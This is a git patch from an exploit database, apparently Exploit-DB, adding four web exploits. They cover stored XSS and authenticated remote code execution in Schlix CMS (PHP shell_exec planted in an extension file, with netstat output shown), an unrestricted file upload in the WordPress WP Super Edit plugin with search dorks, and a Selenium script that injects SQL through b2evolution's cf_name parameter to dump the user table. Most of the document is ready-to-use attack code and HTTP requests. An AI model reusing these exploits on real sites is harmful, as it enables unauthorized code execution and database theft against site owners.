From 72135d9121d84ec5890794bcdcc3ffa8429b2927 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 7 May 2021 05:02:58 +0000 Subject: [PATCH] DB: 2021-05-07 4 changes to exploits/shellcodes Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated) Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload b2evolution 7-2-2 - 'cf_name' SQL Injection --- exploits/multiple/webapps/49837.txt | 182 +++++++++++++++++ exploits/multiple/webapps/49838.txt | 295 ++++++++++++++++++++++++++++ exploits/php/webapps/49839.txt | 27 +++ exploits/php/webapps/49840.py | 83 ++++++++ files_exploits.csv | 4 + 5 files changed, 591 insertions(+) create mode 100644 exploits/multiple/webapps/49837.txt create mode 100644 exploits/multiple/webapps/49838.txt create mode 100644 exploits/php/webapps/49839.txt create mode 100755 exploits/php/webapps/49840.py diff --git a/exploits/multiple/webapps/49837.txt b/exploits/multiple/webapps/49837.txt new file mode 100644 index 000000000..e293ad1b6 --- /dev/null +++ b/exploits/multiple/webapps/49837.txt @@ -0,0 +1,182 @@ +# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) +# Date: 2021-05-05 +# Exploit Author: Emircan Baş +# Vendor Homepage: https://www.schlix.com/ +# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip +# Version: 2.2.6-6 +# Tested on: Windows & WampServer + +==> Tutorial <== + +1- Login with your account. +2- Go to the contacts section. Directory is '/admin/app/contact'. +3- Create a new category and type an XSS payload into the category title. +4- XSS payload will be executed when we travel to created page. + +==> Vulnerable Source Code <== + +
+
+
+
+
+
+

'">

# OUR PAYLOAD IS NON-EXECUTEABLE +
+
+
+
+
+
+
+
  1. +
  2. Contacts
  3. +
# EXECUTED PLACE +
+ +==> HTTP Request <== + +POST /admin/app/contacts?action=savecategory HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489 +Content-Length: 4146 +Origin: (ORIGIN) +Connection: close +Referer: (REFERER) +Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 +Upgrade-Insecure-Requests: 1 + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="_csrftoken" + +49feefcd2b917b9855cd55c8bd174235fa5912e4 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="cid" + +6 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="parent_id" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="guid" + +ee34f23a-7167-a454-8576-20bef7575c15 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="title" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="status" + +1 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="virtual_filename" + +script-alert-1-script +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="summary" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="description" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="meta_description" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="meta_key" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="tags" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="date_available" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="date_expiry" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="items_per_page" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +display_pagetitle +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +__null__ +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +display_child_categories +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +__null__ +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +display_items +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +__null__ +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[child_categories_sortby]" + +date_created +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[items_sortby]" + +date_created +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="permission_read_everyone" + +everyone +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="permission_read[]" + +1 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="permission_read[]" + +2 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="permission_read[]" + +3 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="permission_write[]" + +1 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="cmh_media_selection" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="cmh_media_upload"; filename="" +Content-Type: application/octet-stream + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="cmh_media_path" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="cmh_media_url" + + +-----------------------------280033592236615772622294478489-- \ No newline at end of file diff --git a/exploits/multiple/webapps/49838.txt b/exploits/multiple/webapps/49838.txt new file mode 100644 index 000000000..cb06fcdb3 --- /dev/null +++ b/exploits/multiple/webapps/49838.txt @@ -0,0 +1,295 @@ +# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated) +# Date: 2021-05-06 +# Exploit Author: Eren Saraç +# Vendor Homepage: https://www.schlix.com/ +# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip +# Version: 2.2.6-6 +# Tested on: Windows & WampServer + +==> Tutorial <== + +1- Login with your account. +2- Go to the block management section. Directory is '/admin/app/core.blockmanager'. +3- Create a new category. +4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp +5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory. +6- Paste this PHP code below and save it. +##################################### +$command = shell_exec('netstat -an'); +echo "
$command
"; + +?> +##################################### + +7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'. +8- Install a package to created category and enter the installed 'mailchimp' extension. +9- Click the 'About' tab and our php code will be executed. + +==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <== + +$command"; + +?> + +==> HTTP Request (ZIP Extension Installation) <== + +POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +X-Schlix-Ajax: 1 +Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130 +Content-Length: 51585 +Origin: http(s)://(ORIGIN) +Connection: close +Referer: http(s)://(REFERER)/admin/app/core.blockmanager +Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; +schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 + +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="_csrftoken" + +a3b9a0da8d6be08513f60d1744e2642df0702ff7 +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip" +Content-Type: application/x-zip-compressed + +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# + +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +2097152 +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="zipfileupload__total_file_size" + +0 +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="zipfileupload__max_file_count" + +20 +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="password" + +# Your ACC Password. +-----------------------------29322337091578227221515354130-- + + +==> HTTP Request (RCE - About Tab) <== + +GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http(s)://(HOST)/ +Connection: close +Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; +schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 +Upgrade-Insecure-Requests: 1 + + +==> HTTP Response (RCE - About Tab) <== + +HTTP/1.1 200 OK +Date: Wed, 05 May 2021 21:49:24 GMT +Server: Apache/2.4.46 (Win64) PHP/7.3.21 +X-Powered-By: PHP/7.3.21 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 49575 + + + + +
+
+Active Connections
+
+  Proto  Local Address          Foreign Address        State
+  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:902            0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:912            0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:3307           0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:50296          0.0.0.0:0              LISTENING
+  TCP    127.0.0.1:80           127.0.0.1:58843        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58853        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58854        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58859        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58860        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58865        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58868        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58883        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58893        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58894        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58899        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58902        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58908        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58918        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58919        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58924        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58886        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58887        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58888        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58891        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58905        CLOSE_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58907        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58911        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58913        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58915        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58916        TIME_WAIT
+  TCP    127.0.0.1:58424        127.0.0.1:58425        ESTABLISHED
+  TCP    127.0.0.1:58425        127.0.0.1:58424        ESTABLISHED
+  TCP    127.0.0.1:58435        127.0.0.1:58436        ESTABLISHED
+  TCP    127.0.0.1:58436        127.0.0.1:58435        ESTABLISHED
+  TCP    127.0.0.1:58565        127.0.0.1:58566        ESTABLISHED
+  TCP    127.0.0.1:58566        127.0.0.1:58565        ESTABLISHED
+  TCP    127.0.0.1:58639        127.0.0.1:58640        ESTABLISHED
+  TCP    127.0.0.1:58640        127.0.0.1:58639        ESTABLISHED
+  TCP    169.254.22.167:139     0.0.0.0:0              LISTENING
+  TCP    169.254.224.26:139     0.0.0.0:0              LISTENING
+  TCP    192.168.1.8:139        0.0.0.0:0              LISTENING
+  TCP    192.168.1.8:49500      95.101.14.77:443       ESTABLISHED
+  TCP    192.168.1.8:57059      162.159.129.235:443    ESTABLISHED
+  TCP    192.168.1.8:57902      162.159.138.234:443    ESTABLISHED
+  TCP    192.168.1.8:58453      44.235.189.138:443     ESTABLISHED
+  TCP    192.168.1.8:58626      162.159.138.232:443    ESTABLISHED
+  TCP    192.168.1.8:58627      162.159.133.234:443    ESTABLISHED
+  TCP    192.168.1.8:58699      162.159.135.232:443    ESTABLISHED
+  TCP    192.168.1.8:58841      20.44.232.74:443       ESTABLISHED
+  TCP    192.168.1.8:58942      162.159.138.232:443    ESTABLISHED
+  TCP    192.168.1.8:58951      138.68.92.190:443      ESTABLISHED
+  TCP    192.168.1.8:60549      51.103.5.159:443       ESTABLISHED
+  TCP    192.168.1.8:60610      104.66.70.197:443      ESTABLISHED
+  TCP    192.168.1.8:60611      104.66.70.197:443      ESTABLISHED
+  TCP    192.168.1.8:60612      217.31.233.104:443     CLOSE_WAIT
+  TCP    [::]:80                [::]:0                 LISTENING
+  TCP    [::]:135               [::]:0                 LISTENING
+  TCP    [::]:445               [::]:0                 LISTENING
+  TCP    [::]:3306              [::]:0                 LISTENING
+  TCP    [::]:3307              [::]:0                 LISTENING
+  TCP    [::]:7680              [::]:0                 LISTENING
+  TCP    [::]:49664             [::]:0                 LISTENING
+  TCP    [::]:49665             [::]:0                 LISTENING
+  TCP    [::]:49666             [::]:0                 LISTENING
+  TCP    [::]:49667             [::]:0                 LISTENING
+  TCP    [::]:49668             [::]:0                 LISTENING
+  TCP    [::]:50296             [::]:0                 LISTENING
+  TCP    [::1]:3306             [::1]:58845            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58856            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58857            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58858            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58932            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58935            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58940            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58950            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58953            ESTABLISHED
+  TCP    [::1]:3306             [::1]:58954            ESTABLISHED
+  TCP    [::1]:49485            [::1]:49486            ESTABLISHED
+  TCP    [::1]:49486            [::1]:49485            ESTABLISHED
+  TCP    [::1]:49669            [::]:0                 LISTENING
+  TCP    [::1]:58844            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58845            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58855            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58856            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58857            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58858            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58861            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58862            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58863            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58864            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58866            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58867            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58869            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58870            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58884            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58885            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58929            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58930            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58931            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58932            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58934            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58935            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58939            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58940            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58946            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58947            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58949            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58950            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58953            [::1]:3306             ESTABLISHED
+  TCP    [::1]:58954            [::1]:3306             ESTABLISHED
+  UDP    0.0.0.0:5050           *:*                    
+  UDP    0.0.0.0:5353           *:*                    
+  UDP    0.0.0.0:5355           *:*                    
+  UDP    0.0.0.0:53240          *:*                    
+  UDP    0.0.0.0:53241          *:*                    
+  UDP    127.0.0.1:1900         *:*                    
+  UDP    127.0.0.1:62353        *:*                    
+  UDP    127.0.0.1:63129        *:*                    
+  UDP    192.168.1.8:137        *:*                    
+  UDP    192.168.1.8:138        *:*                    
+  UDP    192.168.1.8:1900       *:*                    
+  UDP    192.168.1.8:2177       *:*                    
+  UDP    192.168.1.8:63128      *:*                    
+  UDP    [::]:5353              *:*                    
+  UDP    [::]:5355              *:*                    
+  UDP    [::1]:1900             *:*                    
+  UDP    [::1]:63125            *:*                                
+  UDP    [fe80::e4d5:62f5:da3:2dae%21]:1900  *:*                    
+  UDP    [fe80::e4d5:62f5:da3:2dae%21]:2177  *:*                    
+  UDP    [fe80::e4d5:62f5:da3:2dae%21]:63124  *:*                    
+
+
+
+
+
+

mailchimp

+

v1.0

Author: Alip

+

Web: https://github.com/calip/app_mailchimp

+

Uninstall

+
+
+
+
+
+ \ No newline at end of file diff --git a/exploits/php/webapps/49839.txt b/exploits/php/webapps/49839.txt new file mode 100644 index 000000000..ed9603201 --- /dev/null +++ b/exploits/php/webapps/49839.txt @@ -0,0 +1,27 @@ +# Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload +# Author: h4shur +# date: 2021-05-06 +# Vendor Homepage: https://wordpress.org +# Software Link: https://wordpress.org/plugins/wp-super-edit/ +# Version : 2.5.4 and earlier +# Tested on: Windows 10 & Google Chrome +# Category : Web Application Bugs +# Dork : +# inurl:"wp-content/plugins/wp-super-edit/superedit/" +# inurl:"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/" + + +### Note: + +# 1. Technical Description: +This plugin allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. + +# 2. Technical Description: +WordPress Plugin "wp-super-edit" allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. This vulnerability is caused by FCKeditor in this plugin. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. + +### POC: + +* Exploit 1 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/browser.html +* Exploit 2 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/connectors/test.html +* Exploit 3 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/test.html +* Exploit 4 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/frmupload.html \ No newline at end of file diff --git a/exploits/php/webapps/49840.py b/exploits/php/webapps/49840.py new file mode 100755 index 000000000..67f5c96fc --- /dev/null +++ b/exploits/php/webapps/49840.py @@ -0,0 +1,83 @@ +# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection +# Author: @nu11secur1ty +# Testing and Debugging: @nu11secur1ty +# Date: 05.06.2021 +# Vendor: https://b2evolution.net/ +# Link: https://b2evolution.net/downloads/7-2-2 +# CVE: CVE-2021-28242 +# Proof: https://streamable.com/x51kso + +[+] Exploit Source: + +#!/usr/bin/python3 +# Author: @nu11secur1ty +# CVE-2021-28242 + + +from selenium import webdriver +import time + + +# Vendor: https://typo3.org/ +website_link=" +http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link" + +# enter your login username +username="admin" + +# enter your login password +password="FvsDq7fmHvWF" + +#enter the element for username input field +element_for_username="x" + +#enter the element for password input field +element_for_password="q" + +#enter the element for submit button +element_for_submit="login_action[login]" + + +browser = webdriver.Chrome() #uncomment this line,for chrome users +#browser = webdriver.Safari() #for macOS users[for others use chrome vis +chromedriver] +#browser = webdriver.Firefox() #uncomment this line,for chrome users + +browser.get((website_link)) + +try: +username_element = browser.find_element_by_name(element_for_username) +username_element.send_keys(username) +password_element = browser.find_element_by_name(element_for_password) +password_element.send_keys(password) +signInButton = browser.find_element_by_name(element_for_submit) +signInButton.click() + +# Exploit vulnerability MySQL obtain sensitive database information by +injecting SQL commands into the "cf_name" parameter +time.sleep(7) +# Receaving sensitive info for evo_users +browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) + +time.sleep(7) +# Receaving sensitive info for evo_blogs +browser.get((" +http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) + +time.sleep(7) +# Receaving sensitive info for evo_section +browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) + + +time.sleep(7) +browser.close() + + +print("At the time, of the exploit, you had to see information about the +tables...\n") + + + +except Exception: +#### This exception occurs if the element are not found in the webpage. +print("Sorry, your exploit is not working for some reasons...") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8cd37617a..99bf55fb5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44003,3 +44003,7 @@ id,file,description,date,author,type,platform,port 49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, 49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, 49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, +49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Enes Özeser",webapps,multiple, +49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple, +49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",2021-05-06,h4shur,webapps,php, +49840,exploits/php/webapps/49840.py,"b2evolution 7-2-2 - 'cf_name' SQL Injection",2021-05-06,nu11secur1ty,webapps,php,